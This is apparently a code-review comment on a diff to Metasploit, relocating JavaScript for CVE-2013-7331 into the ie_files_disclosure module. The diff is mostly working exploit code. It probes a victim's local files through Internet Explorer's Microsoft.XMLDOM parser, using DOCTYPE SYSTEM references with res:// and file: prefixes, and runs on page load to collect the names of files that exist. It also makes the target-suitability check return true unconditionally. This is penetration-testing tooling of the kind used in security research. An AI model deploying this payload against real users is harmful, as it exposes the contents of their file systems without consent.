I don't think it's worth putting the js in ie_addons.js

Author: wchen-r7

data/js/detect/ie_addons.js

@@ -1,83 +1,5 @@
 var ie_addons_detect = { };
 
-var XMLDOMRESULTS = {
-  UNKNOWN : {value: 0, message: "Unknown!", color: "black", data: ""}, 
-  BADBROWSER: {value: 1, message: "Browser is not supported. You need IE!", color: "black", data: ""}, 
-  FILEFOUND : {value: 2, message: "File was found!", color: "green", data: ""},
-  FOLDERFOUND : {value: 3, message: "Folder was found!", color: "green", data: ""},
-  NOTFOUND : {value: 4, message: "Object was not found!", color: "red", data: ""},
-  ALIVE : {value: 5, message: "Alive address!", color: "green", data: ""},
-  MAYBEALIVE : {value: 6, message: "Maybe an alive address!", color: "blue", data: ""},
-  DEAD : {value: 7, message: "Dead to me! Undetectable?", color: "red", data: ""},
-  VALIDDRIVE : {value: 8, message: "Available Drive!", color: "green", data: ""},
-  INVALIDDRIVE : {value: 9, message: "Unavailable Drive!", color: "red", data: ""}
-};
-
-ie_addons_detect.validateXML = function (txt) {
-  // This is CVE-2013-7331. See auxiliary/gather/ie_files_disclosure
-  var result = XMLDOMRESULTS.UNKNOWN;
-  if (window.ActiveXObject) {
-    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
-    xmlDoc.async = true;
-    try {
-      xmlDoc.loadXML(txt);
-      if (xmlDoc.parseError.errorCode != 0) {
-        var err;
-        err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
-        err += "Error Reason: " + xmlDoc.parseError.reason;
-        err += "Error Line: " + xmlDoc.parseError.line;
-        var errReason = xmlDoc.parseError.reason.toLowerCase();
-        if (errReason.search('access is denied') >= 0)  {
-          result = XMLDOMRESULTS.ALIVE;
-        } else if(errReason.search('the system cannot locate the object') >= 0 || errReason.search('the system cannot find the file') >= 0 || errReason.search('the network path was not found') >= 0) {
-          result = XMLDOMRESULTS.NOTFOUND;
-        } else if(errReason!=''){
-          result = XMLDOMRESULTS.FILEFOUND;
-        } else{
-          result = XMLDOMRESULTS.UNKNOWN; // No Error? Unknown!
-        };
-        } else {
-          result = XMLDOMRESULTS.FILEFOUND;
-      }
-    } catch (e) {
-        result = XMLDOMRESULTS.FOLDERFOUND;
-    }
-  } else {
-      result = XMLDOMRESULTS.BADBROWSER;
-  }
-    result.data = "";
-    return result;
-};
-
-
-ie_addons_detect.checkFiles = function (files) {
-  var foundFiles = new Array();
-  // the first one is for all drives, the others are for the C drive only!
-  var preMagics = ["res://","\\\\localhost\\\\", "file:\\\\localhost\\", "file:\\"];
-  // or any other irrelevant ADS! - we do not need this when we use Res://
-  var postMagics = ["::$index_allocation"];
-
-  var templateString = '<?xml version="1.0" ?><\!DOCTYPE anything SYSTEM "$target$">';
-
-  for (var i = 0; i < files.length; i++) {
-    var filename = files[i];
-    if (filename != '') {
-      filename = preMagics[0] + filename; // postMagics can be used too!
-      var result = ie_addons_detect.validateXML(templateString.replace("$target$", filename));
-      if (result == XMLDOMRESULTS.FOLDERFOUND || result == XMLDOMRESULTS.ALIVE) result = XMLDOMRESULTS.UNKNOWN;
-      result.data = filename;
-      if (result.message.search(/file was found/i) > -1) {
-        var trimmedFilename = result.data;
-        // Clean up filenames
-        for (var prem in preMagics)   { trimmedFilename = trimmedFilename.replace(preMagics[prem], ''); }
-        for (var postm in postMagics) { trimmedFilename = trimmedFilename.replace(postMagics[postm], ''); }
-        foundFiles.push(trimmedFilename);
-      }
-    }
-  }
-  return foundFiles;
-};
-
 /**
  * Returns true if this ActiveX is available, otherwise false.
  * Grabbed this directly from browser_autopwn.rb

modules/auxiliary/gather/ie_files_disclosure.rb

@@ -49,15 +49,93 @@ def js
     js_target_files = target_files * ','
 
     %Q|
-    #{js_base64}
-    #{js_ie_addons_detect}
     #{js_ajax_post}
 
+    var RESULTS = {
+      UNKNOWN : {value: 0, message: "Unknown!", color: "black", data: ""},
+      BADBROWSER: {value: 1, message: "Browser is not supported. You need IE!", color: "black", data: ""},
+      FILEFOUND : {value: 2, message: "File was found!", color: "green", data: ""},
+      FOLDERFOUND : {value: 3, message: "Folder was found!", color: "green", data: ""},
+      NOTFOUND : {value: 4, message: "Object was not found!", color: "red", data: ""},
+      ALIVE : {value: 5, message: "Alive address!", color: "green", data: ""},
+      MAYBEALIVE : {value: 6, message: "Maybe an alive address!", color: "blue", data: ""},
+      DEAD : {value: 7, message: "Dead to me! Undetectable?", color: "red", data: ""},
+      VALIDDRIVE : {value: 8, message: "Available Drive!", color: "green", data: ""},
+      INVALIDDRIVE : {value: 9, message: "Unavailable Drive!", color: "red", data: ""}
+    };
+
+
+    function validateXML(txt) {
+      var result = RESULTS.UNKNOWN;
+
+      if (window.ActiveXObject) {
+        var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
+        xmlDoc.async = true;
+        try {
+          xmlDoc.loadXML(txt);
+          if (xmlDoc.parseError.errorCode != 0) {
+            var err;
+            err = "Error Code: " + xmlDoc.parseError.errorCode + "\\n";
+            err += "Error Reason: " + xmlDoc.parseError.reason;
+            err += "Error Line: " + xmlDoc.parseError.line;
+
+            var errReason = xmlDoc.parseError.reason.toLowerCase();
+            if (errReason.search('access is denied') >= 0)  {
+              result = RESULTS.ALIVE;
+            } else if(errReason.search('the system cannot locate the object') >= 0 \|\| errReason.search('the system cannot find the file') >= 0 \|\| errReason.search('the network path was not found') >= 0) {
+              result = RESULTS.NOTFOUND;
+            } else if(errReason!=''){
+              result = RESULTS.FILEFOUND;
+            } else{
+              result = RESULTS.UNKNOWN; // No Error? Unknown!
+            };
+          } else {
+            result = RESULTS.FILEFOUND;
+          }
+        } catch (e) {
+          result = RESULTS.FOLDERFOUND;
+        }
+      } else {
+        result = RESULTS.BADBROWSER;
+      }
+      result.data = "";
+
+      return result;
+    };
+
+
+    function checkFiles(files) {
+      var foundFiles = new Array();
+      // the first one is for all drives, the others are for the C drive only!
+      var preMagics = ["res://","\\\\\\\\localhost\\\\", "file:\\\\\\\\localhost\\\\", "file:\\\\"];
+      // or any other irrelevant ADS! - we do not need this when we use Res://
+      var postMagics = ["::$index_allocation"];
+
+      var templateString = '<?xml version="1.0" ?><\!DOCTYPE anything SYSTEM "$target$">';
+
+      for (var i = 0; i < files.length; i++) {
+        var filename = files[i];
+        if (filename != '') {
+          filename = preMagics[0] + filename; // postMagics can be used too!
+          var result = validateXML(templateString.replace("$target$", filename));
+          if (result == RESULTS.FOLDERFOUND \|\| result == RESULTS.ALIVE) result = RESULTS.UNKNOWN;
+          result.data = filename;
+          if (result.message.search(/file was found/i) > -1) {
+            var trimmedFilename = result.data;
+            for (var prem in preMagics)   { trimmedFilename = trimmedFilename.replace(preMagics[prem], ''); }
+            for (var postm in postMagics) { trimmedFilename = trimmedFilename.replace(postMagics[postm], ''); }
+            foundFiles.push(trimmedFilename);
+          }
+        }
+      }
+      return foundFiles;
+    };
+
     var foundFileString = "";
 
     window.onload = function() {
       var files = [#{js_target_files}];
-      var foundFiles = ie_addons_detect.checkFiles(files);
+      var foundFiles = checkFiles(files);
       for (var file in foundFiles) {
         foundFileString += foundFiles[file] + "\|";
       }
@@ -117,7 +195,7 @@ def is_target_suitable?(user_agent)
       return true
     end
 
-    false
+    true
   end
 
   def on_request_uri(cli, req)